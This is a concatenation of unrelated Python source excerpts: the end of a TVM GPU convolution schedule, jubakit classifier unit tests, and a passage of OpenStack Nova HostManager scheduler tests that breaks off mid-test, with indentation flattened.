coo, coi = s[conv].split(co, nparts=1)
ooho, oohi = s[conv].split(ooh, factor=z_factor)
oowo, oowi = s[conv].split(oow, factor=y_factor)
vco, vci = s[conv].split(vc, factor=x_factor)
s[conv].reorder(_, coo, vco, ooho, oowo, coi, oohi, oowi, vci, ioh, iow)
s[conv].bind(oohi, thread_z)
s[conv].bind(oowi, thread_y)
s[conv].bind(vci, thread_x)
s[conv].bind(ooho, tvm.thread_axis("blockIdx.z"))
s[conv].bind(oowo, tvm.thread_axis("blockIdx.y"))
s[conv].bind(coi, tvm.thread_axis("blockIdx.x"))
# schedule conv_L
s[conv_L].compute_at(s[conv], vci)
i, oc, h, w, vc = s[conv_L].op.axis
rc, ry, rx = s[conv_L].op.reduce_axis
s[conv_L].reorder(i, oc, rc, ry, rx, vc, h, w)
s[temp_W].compute_at(s[conv_L], rc)
if kernel.shape[3].value != 7:
s[conv_L].unroll(ry)
s[conv_L].unroll(rx)
# schedule temp
_, ci, h, w = s[temp].op.axis
tile_and_bind3d(s, temp, ci, h, w, 1, 16, 16)
# schedule temp_W
_, ci, h, w = s[temp_W].op.axis
zo, zi = s[temp_W].split(ci, 1)
yo, yi = s[temp_W].split(h, 1)
xo, xi = s[temp_W].split(w, 16)
s[temp_W].reorder(zo, yo, xo, zi, yi, xi)
s[temp_W].bind(zi, thread_z)
s[temp_W].bind(yi, thread_y)
s[temp_W].bind(xi, thread_x)
s[temp_W].storage_align(s[temp_W].op.axis[2], 16, 0)
s[kernel_vec].compute_inline()
# schedule kernel_L
if "2_14" in s[conv].op.tag:
s[kernel_L].compute_at(s[conv_L], ry)
else:
s[kernel_L].compute_at(s[conv_L], rx)
# schedule output
if output.op in s.outputs:
out = output
else:
s[output].compute_inline()
out = s.outputs[0]
_, co, h, w = s[out].op.axis
tile_and_bind3d(s, out, w, h, co, 4, 8, 8)
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from unittest import TestCase
try:
import numpy as np
from scipy.sparse import csr_matrix
except ImportError:
pass
from jubakit.classifier import Schema, Dataset, Classifier, Config
from jubakit.compat import *
from . import requireSklearn, requireEmbedded
from .stub import *
class SchemaTest(TestCase):
def test_simple(self):
schema = Schema({
'k1': Schema.STRING,
'k2': Schema.LABEL,
})
(label, d) = schema.transform({'k1': 'abc', 'k2': 'def'})
self.assertEqual(label, 'def')
self.assertEqual({'k1': 'abc'}, dict(d.string_values))
(label, d) = schema.transform({'k1': 'foo', 'k2': None}) # unlabeled data
self.assertEqual(label, None)
self.assertEqual({'k1': 'foo'}, dict(d.string_values))
def test_without_label(self):
# schema without label can be defined
Schema({
'k1': Schema.STRING,
})
def test_illegal_label(self):
# schema with multiple labels
self.assertRaises(RuntimeError, Schema, {
'k1': Schema.LABEL,
'k2': Schema.LABEL
})
# schema fallback set to label
self.assertRaises(RuntimeError, Schema, {
'k1': Schema.LABEL
}, Schema.LABEL)
class DatasetTest(TestCase):
def test_simple(self):
loader = StubLoader()
schema = Schema({'v': Schema.LABEL})
ds = Dataset(loader, schema)
for (idx, (label, d)) in ds:
self.assertEqual(unicode_t(idx+1), label)
self.assertEqual(0, len(d.string_values))
self.assertEqual(0, len(d.num_values))
self.assertEqual(0, len(d.binary_values))
self.assertEqual(['1','2','3'], list(ds.get_labels()))
def test_predict(self):
loader = StubLoader()
dataset = Dataset(loader) # predict
self.assertEqual(['v', 1.0], dataset[0][1].num_values[0])
def test_get_labels(self):
loader = StubLoader()
schema = Schema({'v': Schema.LABEL})
ds = Dataset(loader, schema)
self.assertEqual(['1', '2', '3'], list(ds.get_labels()))
def test_invalid_get_labels(self):
loader = StubLoader()
schema = Schema({'v': Schema.LABEL})
ds = Dataset(loader, schema, static=False)
# get_labels returns generator; as generator will be evaluated
# when actually iterating over it, pass it to list().
self.assertRaises(RuntimeError, list, ds.get_labels())
@requireSklearn
def test_from_data(self):
# load from array format
ds = Dataset.from_data(
[ [10,20,30], [20,10,50], [40,10,30] ], # data
[ 0, 1, 0 ], # labels
['k1', 'k2', 'k3'], # feature_names
['pos', 'neg'], # label_names
)
expected_labels = ['pos', 'neg', 'pos']
expected_k1s = [10, 20, 40]
actual_labels = []
actual_k1s = []
for (idx, (label, d)) in ds:
actual_labels.append(label)
actual_k1s.append(dict(d.num_values)['k1'])
self.assertEqual(expected_labels, actual_labels)
self.assertEqual(expected_k1s, actual_k1s)
# load from scipy.sparse format
ds = Dataset.from_data(
self._create_matrix(), # data
[ 0, 1, 0 ], # labels
[ 'k1', 'k2', 'k3'], # feature_names
[ 'pos', 'neg'], # label_names
)
expected_labels = ['pos', 'neg', 'pos']
expected_k1s = [1, None, 4]
expected_k3s = [2, 3, 6]
actual_labels = []
actual_k1s = []
actual_k3s = []
for (idx, (label, d)) in ds:
actual_labels.append(label)
actual_k1s.append(dict(d.num_values).get('k1', None))
actual_k3s.append(dict(d.num_values).get('k3', None))
self.assertEqual(expected_labels, actual_labels)
self.assertEqual(expected_k1s, actual_k1s)
self.assertEqual(expected_k3s, actual_k3s)
def test_from_array(self):
ds = Dataset.from_array(
[ [10,20,30], [20,10,50], [40,10,30] ], # data
[ 0, 1, 0 ], # labels
['k1', 'k2', 'k3'], # feature_names
['pos', 'neg'], # label_names
)
expected_labels = ['pos', 'neg', 'pos']
expected_k1s = [10, 20, 40]
actual_labels = []
actual_k1s = []
for (idx, (label, d)) in ds:
actual_labels.append(label)
actual_k1s.append(dict(d.num_values)['k1'])
self.assertEqual(expected_labels, actual_labels)
self.assertEqual(expected_k1s, actual_k1s)
def test_from_array_without_label(self):
ds = Dataset.from_array(
[ [10,20,30], [20,10,50], [40,10,30] ], # data
None, # labels
['k1', 'k2', 'k3'], # feature_names
['pos', 'neg'], # label_names
)
expected_labels = [None, None, None]
expected_k1s = [10, 20, 40]
actual_labels = []
actual_k1s = []
for (idx, (label, d)) in ds:
actual_labels.append(label)
actual_k1s.append(dict(d.num_values)['k1'])
self.assertEqual(expected_labels, actual_labels)
self.assertEqual(expected_k1s, actual_k1s)
@requireSklearn
def test_from_matrix(self):
ds = Dataset.from_matrix(
self._create_matrix(), # data
[ 0, 1, 0 ], # labels
[ 'k1', 'k2', 'k3'], # feature_names
[ 'pos', 'neg'], # label_names
)
expected_labels = ['pos', 'neg', 'pos']
expected_k1s = [1,None,4]
expected_k3s = [2,3,6]
actual_labels = []
actual_k1s = []
actual_k3s = []
for (idx, (label, d)) in ds:
actual_labels.append(label)
actual_k1s.append(dict(d.num_values).get('k1', None))
actual_k3s.append(dict(d.num_values).get('k3', None))
self.assertEqual(expected_labels, actual_labels)
self.assertEqual(expected_k1s, actual_k1s)
self.assertEqual(expected_k3s, actual_k3s)
def _create_matrix(self):
"""
Create a sparse matrix:
[[1, 0, 2],
[0, 0, 3],
[4, 5, 6]]
"""
row = np.array([0, 0, 1, 2, 2, 2])
col = np.array([0, 2, 2, 0, 1, 2])
data = np.array([1, 2, 3, 4, 5, 6])
return csr_matrix((data, (row, col)), shape=(3, 3))
class ClassifierTest(TestCase):
def test_simple(self):
classifier = Classifier()
@requireEmbedded
def test_embedded(self):
classifier = Classifier.run(Config(), embedded=True)
class ConfigTest(TestCase):
def test_simple(self):
config = Config()
self.assertEqual('AROW', config['method'])
def test_methods(self):
config = Config()
self.assertTrue(isinstance(config.methods(), list))
def test_default(self):
config = Config.default()
self.assertEqual('AROW', config['method'])
def test_method_param(self):
self.assertTrue('parameter' not in Config(method='PA'))
self.assertTrue('regularization_weight' in Config(method='PA1')['parameter'])
self.assertTrue('nearest_neighbor_num' in Config(method='NN')['parameter'])
self.assertTrue('nearest_neighbor_num' in Config(method='cosine')['parameter'])
self.assertTrue('nearest_neighbor_num' in Config(method='euclidean')['parameter'])
def test_invalid_method(self):
self.assertRaises(RuntimeError, Config._default_parameter, 'invalid_method')
| |
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For HostManager
"""
import collections
import contextlib
import datetime
import mock
from oslo_serialization import jsonutils
from oslo_utils import versionutils
import six
import nova
from nova.compute import task_states
from nova.compute import vm_states
from nova import context as nova_context
from nova import exception
from nova import objects
from nova.objects import base as obj_base
from nova.pci import stats as pci_stats
from nova.scheduler import filters
from nova.scheduler import host_manager
from nova import test
from nova.tests import fixtures
from nova.tests.unit import fake_instance
from nova.tests.unit import matchers
from nova.tests.unit.scheduler import fakes
from nova.tests import uuidsentinel as uuids
class FakeFilterClass1(filters.BaseHostFilter):
def host_passes(self, host_state, filter_properties):
pass
class FakeFilterClass2(filters.BaseHostFilter):
def host_passes(self, host_state, filter_properties):
pass
class HostManagerTestCase(test.NoDBTestCase):
"""Test case for HostManager class."""
@mock.patch.object(host_manager.HostManager, '_init_instance_info')
@mock.patch.object(host_manager.HostManager, '_init_aggregates')
def setUp(self, mock_init_agg, mock_init_inst):
super(HostManagerTestCase, self).setUp()
self.flags(available_filters=[
__name__ + '.FakeFilterClass1', __name__ + '.FakeFilterClass2'],
group='filter_scheduler')
self.flags(enabled_filters=['FakeFilterClass1'],
group='filter_scheduler')
self.host_manager = host_manager.HostManager()
cell = uuids.cell
self.fake_hosts = [host_manager.HostState('fake_host%s' % x,
'fake-node', cell) for x in range(1, 5)]
self.fake_hosts += [host_manager.HostState('fake_multihost',
'fake-node%s' % x, cell) for x in range(1, 5)]
self.useFixture(fixtures.SpawnIsSynchronousFixture())
def test_load_filters(self):
filters = self.host_manager._load_filters()
self.assertEqual(filters, ['FakeFilterClass1'])
def test_refresh_cells_caches(self):
ctxt = nova_context.RequestContext('fake', 'fake')
# Loading the non-cell0 mapping from the base test class.
self.assertEqual(1, len(self.host_manager.enabled_cells))
self.assertEqual(1, len(self.host_manager.cells))
# Creating cell mappings for mocking the list of cell_mappings obtained
# so that the refreshing mechanism can be properly tested. This will in
# turn ignore the loaded cell mapping from the base test case setup.
cell_uuid1 = uuids.cell1
cell_mapping1 = objects.CellMapping(context=ctxt,
uuid=cell_uuid1,
database_connection='fake:///db1',
transport_url='fake:///mq1',
disabled=False)
cell_uuid2 = uuids.cell2
cell_mapping2 = objects.CellMapping(context=ctxt,
uuid=cell_uuid2,
database_connection='fake:///db2',
transport_url='fake:///mq2',
disabled=True)
cell_uuid3 = uuids.cell3
cell_mapping3 = objects.CellMapping(context=ctxt,
uuid=cell_uuid3,
database_connection='fake:///db3',
transport_url='fake:///mq3',
disabled=False)
cells = [cell_mapping1, cell_mapping2, cell_mapping3]
with mock.patch('nova.objects.CellMappingList.get_all',
return_value=cells) as mock_cm:
self.host_manager.refresh_cells_caches()
mock_cm.assert_called_once()
self.assertEqual(2, len(self.host_manager.enabled_cells))
self.assertEqual(cell_uuid3, self.host_manager.enabled_cells[1].uuid)
self.assertEqual(3, len(self.host_manager.cells))
self.assertEqual(cell_uuid2, self.host_manager.cells[1].uuid)
def test_refresh_cells_caches_except_cell0(self):
ctxt = nova_context.RequestContext('fake-user', 'fake_project')
cell_uuid0 = objects.CellMapping.CELL0_UUID
cell_mapping0 = objects.CellMapping(context=ctxt,
uuid=cell_uuid0,
database_connection='fake:///db1',
transport_url='fake:///mq1')
cells = objects.CellMappingList(cell_mapping0)
# Mocking the return value of get_all cell_mappings to return only
# the cell0 mapping to check if its filtered or not.
with mock.patch('nova.objects.CellMappingList.get_all',
return_value=cells) as mock_cm:
self.host_manager.refresh_cells_caches()
mock_cm.assert_called_once()
self.assertEqual(0, len(self.host_manager.cells))
@mock.patch.object(nova.objects.InstanceList, 'get_by_filters')
@mock.patch.object(nova.objects.ComputeNodeList, 'get_all')
def test_init_instance_info_batches(self, mock_get_all,
mock_get_by_filters):
cn_list = objects.ComputeNodeList()
for num in range(22):
host_name = 'host_%s' % num
cn_list.objects.append(objects.ComputeNode(host=host_name))
mock_get_all.return_value = cn_list
self.host_manager._init_instance_info()
self.assertEqual(mock_get_by_filters.call_count, 3)
@mock.patch.object(nova.objects.InstanceList, 'get_by_filters')
@mock.patch.object(nova.objects.ComputeNodeList, 'get_all')
def test_init_instance_info(self, mock_get_all,
mock_get_by_filters):
cn1 = objects.ComputeNode(host='host1')
cn2 = objects.ComputeNode(host='host2')
inst1 = objects.Instance(host='host1', uuid=uuids.instance_1)
inst2 = objects.Instance(host='host1', uuid=uuids.instance_2)
inst3 = objects.Instance(host='host2', uuid=uuids.instance_3)
mock_get_all.return_value = objects.ComputeNodeList(objects=[cn1, cn2])
mock_get_by_filters.return_value = objects.InstanceList(
objects=[inst1, inst2, inst3])
hm = self.host_manager
hm._instance_info = {}
hm._init_instance_info()
self.assertEqual(len(hm._instance_info), 2)
fake_info = hm._instance_info['host1']
self.assertIn(uuids.instance_1, fake_info['instances'])
self.assertIn(uuids.instance_2, fake_info['instances'])
self.assertNotIn(uuids.instance_3, fake_info['instances'])
exp_filters = {'deleted': False, 'host': [u'host1', u'host2']}
mock_get_by_filters.assert_called_once_with(mock.ANY, exp_filters)
@mock.patch.object(nova.objects.InstanceList, 'get_by_filters')
@mock.patch.object(nova.objects.ComputeNodeList, 'get_all')
def test_init_instance_info_compute_nodes(self, mock_get_all,
mock_get_by_filters):
cn1 = objects.ComputeNode(host='host1')
cn2 = objects.ComputeNode(host='host2')
inst1 = objects.Instance(host='host1', uuid=uuids.instance_1)
inst2 = objects.Instance(host='host1', uuid=uuids.instance_2)
inst3 = objects.Instance(host='host2', uuid=uuids.instance_3)
cell = objects.CellMapping(database_connection='',
target_url='')
mock_get_by_filters.return_value = objects.InstanceList(
objects=[inst1, inst2, inst3])
hm = self.host_manager
hm._instance_info = {}
hm._init_instance_info({cell: [cn1, cn2]})
self.assertEqual(len(hm._instance_info), 2)
fake_info = hm._instance_info['host1']
self.assertIn(uuids.instance_1, fake_info['instances'])
self.assertIn(uuids.instance_2, fake_info['instances'])
self.assertNotIn(uuids.instance_3, fake_info['instances'])
exp_filters = {'deleted': False, 'host': [u'host1', u'host2']}
mock_get_by_filters.assert_called_once_with(mock.ANY, exp_filters)
# should not be called if the list of nodes was passed explicitly
self.assertFalse(mock_get_all.called)
def test_enabled_filters(self):
enabled_filters = self.host_manager.enabled_filters
self.assertEqual(1, len(enabled_filters))
self.assertIsInstance(enabled_filters[0], FakeFilterClass1)
@mock.patch.object(host_manager.HostManager, '_init_instance_info')
@mock.patch.object(objects.AggregateList, 'get_all')
def test_init_aggregates_no_aggs(self, agg_get_all, mock_init_info):
agg_get_all.return_value = []
self.host_manager = host_manager.HostManager()
self.assertEqual({}, self.host_manager.aggs_by_id)
self.assertEqual({}, self.host_manager.host_aggregates_map)
@mock.patch.object(host_manager.HostManager, '_init_instance_info')
@mock.patch.object(objects.AggregateList, 'get_all')
def test_init_aggregates_one_agg_no_hosts(self, agg_get_all,
mock_init_info):
fake_agg = objects.Aggregate(id=1, hosts=[])
agg_get_all.return_value = [fake_agg]
self.host_manager = host_manager.HostManager()
self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
self.assertEqual({}, self.host_manager.host_aggregates_map)
@mock.patch.object(host_manager.HostManager, '_init_instance_info')
@mock.patch.object(objects.AggregateList, 'get_all')
def test_init_aggregates_one_agg_with_hosts(self, agg_get_all,
mock_init_info):
fake_agg = objects.Aggregate(id=1, hosts=['fake-host'])
agg_get_all.return_value = [fake_agg]
self.host_manager = host_manager.HostManager()
self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([1])},
self.host_manager.host_aggregates_map)
def test_update_aggregates(self):
fake_agg = objects.Aggregate(id=1, hosts=['fake-host'])
self.host_manager.update_aggregates([fake_agg])
self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([1])},
self.host_manager.host_aggregates_map)
def test_update_aggregates_remove_hosts(self):
fake_agg = objects.Aggregate(id=1, hosts=['fake-host'])
self.host_manager.update_aggregates([fake_agg])
self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([1])},
self.host_manager.host_aggregates_map)
# Let's remove the host from the aggregate and update again
fake_agg.hosts = []
self.host_manager.update_aggregates([fake_agg])
self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([])},
self.host_manager.host_aggregates_map)
def test_delete_aggregate(self):
fake_agg = objects.Aggregate(id=1, hosts=['fake-host'])
self.host_manager.host_aggregates_map = collections.defaultdict(
set, {'fake-host': set([1])})
self.host_manager.aggs_by_id = {1: fake_agg}
self.host_manager.delete_aggregate(fake_agg)
self.assertEqual({}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([])},
self.host_manager.host_aggregates_map)
def test_choose_host_filters_not_found(self):
self.assertRaises(exception.SchedulerHostFilterNotFound,
self.host_manager._choose_host_filters,
'FakeFilterClass3')
def test_choose_host_filters(self):
# Test we return 1 correct filter object
host_filters = self.host_manager._choose_host_filters(
['FakeFilterClass2'])
self.assertEqual(1, len(host_filters))
self.assertIsInstance(host_filters[0], FakeFilterClass2)
def _mock_get_filtered_hosts(self, info):
info['got_objs'] = []
info['got_fprops'] = []
def fake_filter_one(_self, obj, filter_props):
info['got_objs'].append(obj)
info['got_fprops'].append(filter_props)
return True
self.stub_out(__name__ + '.FakeFilterClass1._filter_one',
fake_filter_one)
def _verify_result(self, info, result, filters=True):
for x in info['got_fprops']:
self.assertEqual(x, info['expected_fprops'])
if filters:
self.assertEqual(set(info['expected_objs']), set(info['got_objs']))
self.assertEqual(set(info['expected_objs']), set(result))
def test_get_filtered_hosts(self):
fake_properties = objects.RequestSpec(ignore_hosts=[],
instance_uuid=uuids.instance,
force_hosts=[],
force_nodes=[])
info = {'expected_objs': self.fake_hosts,
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result)
def test_get_filtered_hosts_with_requested_destination(self):
dest = objects.Destination(host='fake_host1', node='fake-node')
fake_properties = objects.RequestSpec(requested_destination=dest,
ignore_hosts=[],
instance_uuid=uuids.fake_uuid1,
force_hosts=[],
force_nodes=[])
info = {'expected_objs': [self.fake_hosts[0]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result)
def test_get_filtered_hosts_with_wrong_requested_destination(self):
dest = objects.Destination(host='dummy', node='fake-node')
fake_properties = objects.RequestSpec(requested_destination=dest,
ignore_hosts=[],
instance_uuid=uuids.fake_uuid1,
force_hosts=[],
force_nodes=[])
info = {'expected_objs': [],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result)
def test_get_filtered_hosts_with_ignore(self):
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=['fake_host1', 'fake_host3',
'fake_host5', 'fake_multihost'],
force_hosts=[],
force_nodes=[])
# [1] and [3] are host2 and host4
info = {'expected_objs': [self.fake_hosts[1], self.fake_hosts[3]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result)
def test_get_filtered_hosts_with_ignore_case_insensitive(self):
fake_properties = objects.RequestSpec(
instance_uuids=uuids.fakehost,
ignore_hosts=['FAKE_HOST1', 'FaKe_HoSt3', 'Fake_Multihost'],
force_hosts=[],
force_nodes=[])
# [1] and [3] are host2 and host4
info = {'expected_objs': [self.fake_hosts[1], self.fake_hosts[3]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result)
def test_get_filtered_hosts_with_force_hosts(self):
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=[],
force_hosts=['fake_host1', 'fake_host3', 'fake_host5'],
force_nodes=[])
# [0] and [2] are host1 and host3
info = {'expected_objs': [self.fake_hosts[0], self.fake_hosts[2]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_force_case_insensitive(self):
fake_properties = objects.RequestSpec(
instance_uuids=uuids.fakehost,
ignore_hosts=[],
force_hosts=['FAKE_HOST1', 'FaKe_HoSt3', 'fake_host4',
'faKe_host5'],
force_nodes=[])
# [1] and [3] are host2 and host4
info = {'expected_objs': [self.fake_hosts[0], self.fake_hosts[2],
self.fake_hosts[3]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_no_matching_force_hosts(self):
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=[],
force_hosts=['fake_host5', 'fake_host6'],
force_nodes=[])
info = {'expected_objs': [],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
with mock.patch.object(self.host_manager.filter_handler,
'get_filtered_objects') as fake_filter:
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self.assertFalse(fake_filter.called)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_ignore_and_force_hosts(self):
# Ensure ignore_hosts processed before force_hosts in host filters.
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=['fake_host1'],
force_hosts=['fake_host3', 'fake_host1'],
force_nodes=[])
# only fake_host3 should be left.
info = {'expected_objs': [self.fake_hosts[2]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_force_host_and_many_nodes(self):
# Ensure all nodes returned for a host with many nodes
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=[],
force_hosts=['fake_multihost'],
force_nodes=[])
info = {'expected_objs': [self.fake_hosts[4], self.fake_hosts[5],
self.fake_hosts[6], self.fake_hosts[7]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_force_nodes(self):
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=[],
force_hosts=[],
force_nodes=['fake-node2', 'fake-node4', 'fake-node9'])
# [5] is fake-node2, [7] is fake-node4
info = {'expected_objs': [self.fake_hosts[5], self.fake_hosts[7]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_force_hosts_and_nodes(self):
# Ensure only overlapping results if both force host and node
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=[],
force_hosts=['fake-host1', 'fake_multihost'],
force_nodes=['fake-node2', 'fake-node9'])
# [5] is fake-node2
info = {'expected_objs': [self.fake_hosts[5]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_force_hosts_and_wrong_nodes(self):
# Ensure non-overlapping force_node and force_host yield no result
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=[],
force_hosts=['fake_multihost'],
force_nodes=['fake-node'])
info = {'expected_objs': [],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_ignore_hosts_and_force_nodes(self):
# Ensure ignore_hosts can coexist with force_nodes
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=['fake_host1', 'fake_host2'],
force_hosts=[],
force_nodes=['fake-node4', 'fake-node2'])
info = {'expected_objs': [self.fake_hosts[5], self.fake_hosts[7]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
def test_get_filtered_hosts_with_ignore_hosts_and_force_same_nodes(self):
# Ensure ignore_hosts is processed before force_nodes
fake_properties = objects.RequestSpec(
instance_uuid=uuids.instance,
ignore_hosts=['fake_multihost'],
force_hosts=[],
force_nodes=['fake_node4', 'fake_node2'])
info = {'expected_objs': [],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
@mock.patch('nova.scheduler.host_manager.LOG')
@mock.patch('nova.objects.ServiceList.get_by_binary')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_get_all_host_states(self, mock_get_by_host, mock_get_all,
mock_get_by_binary, mock_log):
mock_get_by_host.return_value = objects.InstanceList()
mock_get_all.return_value = fakes.COMPUTE_NODES
mock_get_by_binary.return_value = fakes.SERVICES
context = 'fake_context'
# get_all_host_states returns a generator, so make a map from it
host_states_map = {(state.host, state.nodename): state for state in
self.host_manager.get_all_host_states(context)}
self.assertEqual(4, len(host_states_map))
calls = [
mock.call(
"Host %(hostname)s has more disk space than database "
"expected (%(physical)s GB > %(database)s GB)",
{'physical': 3333, 'database': 3072, 'hostname': 'node3'}
),
mock.call(
"No compute service record found for host %(host)s",
{'host': 'fake'}
)
]
self.assertEqual(calls, mock_log.warning.call_args_list)
# Check that .service is set properly
for i in range(4):
compute_node = fakes.COMPUTE_NODES[i]
host = compute_node.host
node = compute_node.hypervisor_hostname
state_key = (host, node)
self.assertEqual(host_states_map[state_key].service,
obj_base.obj_to_primitive(fakes.get_service_by_host(host)))
self.assertEqual(host_states_map[('host1', 'node1')].free_ram_mb,
512)
# 511GB
self.assertEqual(host_states_map[('host1', 'node1')].free_disk_mb,
524288)
self.assertEqual(host_states_map[('host2', 'node2')].free_ram_mb,
1024)
# 1023GB
self.assertEqual(host_states_map[('host2', 'node2')].free_disk_mb,
1048576)
self.assertEqual(host_states_map[('host3', 'node3')].free_ram_mb,
3072)
# 3071GB
self.assertEqual(host_states_map[('host3', 'node3')].free_disk_mb,
3145728)
self.assertThat(
objects.NUMATopology.obj_from_db_obj(
host_states_map[('host3', 'node3')].numa_topology
)._to_dict(),
matchers.DictMatches(fakes.NUMA_TOPOLOGY._to_dict()))
self.assertEqual(host_states_map[('host4', 'node4')].free_ram_mb,
8192)
# 8191GB
self.assertEqual(host_states_map[('host4', 'node4')].free_disk_mb,
8388608)
@mock.patch.object(nova.objects.InstanceList, 'get_by_host')
@mock.patch.object(host_manager.HostState, '_update_from_compute_node')
@mock.patch.object(objects.ComputeNodeList, 'get_all')
@mock.patch.object(objects.ServiceList, 'get_by_binary')
def test_get_all_host_states_with_no_aggs(self, svc_get_by_binary,
cn_get_all, update_from_cn,
mock_get_by_host):
svc_get_by_binary.return_value = [objects.Service(host='fake')]
cn_get_all.return_value = [
objects.ComputeNode(host='fake', hypervisor_hostname='fake')]
mock_get_by_host.return_value = objects.InstanceList()
self.host_manager.host_aggregates_map = collections.defaultdict(set)
hosts = self.host_manager.get_all_host_states('fake-context')
# get_all_host_states returns a generator, so make a map from it
host_states_map = {(state.host, state.nodename): state for state in
hosts}
host_state = host_states_map[('fake', 'fake')]
self.assertEqual([], host_state.aggregates)
@mock.patch.object(nova.objects.InstanceList, 'get_by_host')
@mock.patch.object(host_manager.HostState, '_update_from_compute_node')
@mock.patch.object(objects.ComputeNodeList, 'get_all')
@mock.patch.object(objects.ServiceList, 'get_by_binary')
def test_get_all_host_states_with_matching_aggs(self, svc_get_by_binary,
cn_get_all,
update_from_cn,
mock_get_by_host):
svc_get_by_binary.return_value = [objects.Service(host='fake')]
cn_get_all.return_value = [
objects.ComputeNode(host='fake', hypervisor_hostname='fake')]
mock_get_by_host.return_value = objects.InstanceList()
fake_agg = objects.Aggregate(id=1)
self.host_manager.host_aggregates_map = collections.defaultdict(
set, {'fake': set([1])})
self.host_manager.aggs_by_id = {1: fake_agg}
hosts = self.host_manager.get_all_host_states('fake-context')
# get_all_host_states returns a generator, so make a map from it
host_states_map = {(state.host, state.nodename): state for state in
hosts}
host_state = host_states_map[('fake', 'fake')]
self.assertEqual([fake_agg], host_state.aggregates)
@mock.patch.object(nova.objects.InstanceList, 'get_by_host')
@mock.patch.object(host_manager.HostState, '_update_from_compute_node')
@mock.patch.object(objects.ComputeNodeList, 'get_all')
@mock.patch.object(objects.ServiceList, 'get_by_binary')
def test_get_all_host_states_with_not_matching_aggs(self,
svc_get_by_binary,
cn_get_all,
update_from_cn,
mock_get_by_host):
svc_get_by_binary.return_value = [objects.Service(host='fake'),
objects.Service(host='other')]
cn_get_all.return_value = [
objects.ComputeNode(host='fake', hypervisor_hostname='fake'),
objects.ComputeNode(host='other', hypervisor_hostname='other')]
mock_get_by_host.return_value = objects.InstanceList()
fake_agg = objects.Aggregate(id=1)
self.host_manager.host_aggregates_map = collections.defaultdict(
set, {'other': set([1])})
self.host_manager.aggs_by_id = {1: fake_agg}
hosts = self.host_manager.get_all_host_states('fake-context')
# get_all_host_states returns a generator, so make a map from it
host_states_map = {(state.host, state.nodename): state for state in
hosts}
